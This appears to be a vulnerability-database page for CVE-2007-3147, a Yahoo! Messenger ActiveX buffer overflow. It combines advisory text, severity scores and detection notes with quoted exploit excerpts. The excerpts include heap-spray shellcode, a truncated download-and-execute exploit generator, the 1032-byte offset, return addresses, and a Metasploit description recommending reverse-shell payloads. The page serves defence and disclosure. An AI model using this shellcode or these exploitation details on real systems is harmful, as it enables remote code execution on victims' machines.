CVE-2007-3147
published 2007-06-11CVE-2007-3147: Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary…
PriorityP268critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
40.37%
98.5th percentile
Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC%uCC4A%uD0FF
- →The vulnerable ActiveX control is ywcupl.dll (CLSID instantiation via browser). Detect instantiation of this control in web content or process loading of ywcupl.dll into a browser process. ↗
- →Exploit triggers by setting an overly long string (>1032 bytes) to the Server() method of the ActiveX control, then calling Send(). Monitor for unusually long property assignments followed by a Send() call on this control. ↗
- →Exploit offset is 1032 bytes before the return address overwrite. A buffer of exactly this size preceding shellcode is a reliable signature in network/memory captures. ↗
- →The exploit HTML file generated by the PoC tool is named Click_here.html and contains the heap spray and ActiveX trigger. Filename can be used as a low-confidence indicator. ↗
- ·Return addresses are platform-specific; 0x71aa32ad targets Windows XP SP0/SP1 Pro English and 0x75022ac4 targets Windows 2000 Pro English All. Detections based on these RET values will not fire on other OS versions. ↗
- ·The Metasploit module randomizes the variable names in the generated exploit HTML, reducing reliability of static string-based signatures against the JS variable names. ↗
- ·Payload space is limited to 800 bytes with bad characters \x00\x09\x0a\x0d and quotes/backslashes excluded; shellcode detection signatures must account for this encoding constraint. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-55v5-p5xp-vc55: Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl
ghsa_unreviewed·2022-05-01
CVE-2007-3147 [HIGH] CWE-119 GHSA-55v5-p5xp-vc55: Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl
Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
VulnCheck
yahoo messenger Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2007·CVSS 9.3
CVE-2007-3147 [CRITICAL] yahoo messenger Improper Restriction of Operations within the Bounds of a Memory Buffer
yahoo messenger Improper Restriction of Operations within the Bounds of a Memory Buffer
Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
Affected: yahoo messenger
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2007-3147 Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow (Metasploit)
Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: yahoomessenger_server.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX
Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.
By sending a overly long string to the "Server()" method, and then calling
the "Send()" method, an attacker may be able
Exploit-DB
Yahoo! Messenger Webcam 8.1 - 'Ywcupl.dll' Download / Execute
exploitdb·2007-06-08
CVE-2007-3147 Yahoo! Messenger Webcam 8.1 - 'Ywcupl.dll' Download / Execute
Yahoo! Messenger Webcam 8.1 - 'Ywcupl.dll' Download / Execute
---
/*
Compile in LCC-win32 (Free!)
Download and exec any file you like!
Have Fun!
*/
#include
#include
#include
char *file = "Click_here.html";
FILE *fp = NULL;
unsigned char sc[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x
Exploit-DB
Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow
exploitdb·2007-06-07
CVE-2007-3147 Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow
Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow
---
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.
Metasploit
Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
metasploit
Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. By sending an overly long string to the "Server()" method, and then calling the "Send()" method, an attacker may be able to execute arbitrary code. Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp" yield for the best results.
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.htmlhttp://messenger.yahoo.com/security_update.php?id=060707http://research.eeye.com/html/advisories/published/AD20070608.htmlhttp://research.eeye.com/html/advisories/upcoming/20070605.htmlhttp://secunia.com/advisories/25547http://securityreason.com/securityalert/2809http://securitytracker.com/id?1018204http://www.kb.cert.org/vuls/id/949817http://www.securityfocus.com/archive/1/470861/100/0/threadedhttp://www.securityfocus.com/bid/24341http://www.securityfocus.com/bid/24354http://www.securitytracker.com/id?1018203http://www.vupen.com/english/advisories/2007/2094https://exchange.xforce.ibmcloud.com/vulnerabilities/34758https://www.exploit-db.com/exploits/4042http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.htmlhttp://messenger.yahoo.com/security_update.php?id=060707http://research.eeye.com/html/advisories/published/AD20070608.htmlhttp://research.eeye.com/html/advisories/upcoming/20070605.htmlhttp://secunia.com/advisories/25547http://securityreason.com/securityalert/2809http://securitytracker.com/id?1018204http://www.kb.cert.org/vuls/id/949817http://www.securityfocus.com/archive/1/470861/100/0/threadedhttp://www.securityfocus.com/bid/24341http://www.securityfocus.com/bid/24354http://www.securitytracker.com/id?1018203http://www.vupen.com/english/advisories/2007/2094https://exchange.xforce.ibmcloud.com/vulnerabilities/34758https://www.exploit-db.com/exploits/4042
2007-06-11
Published
Exploited in the wild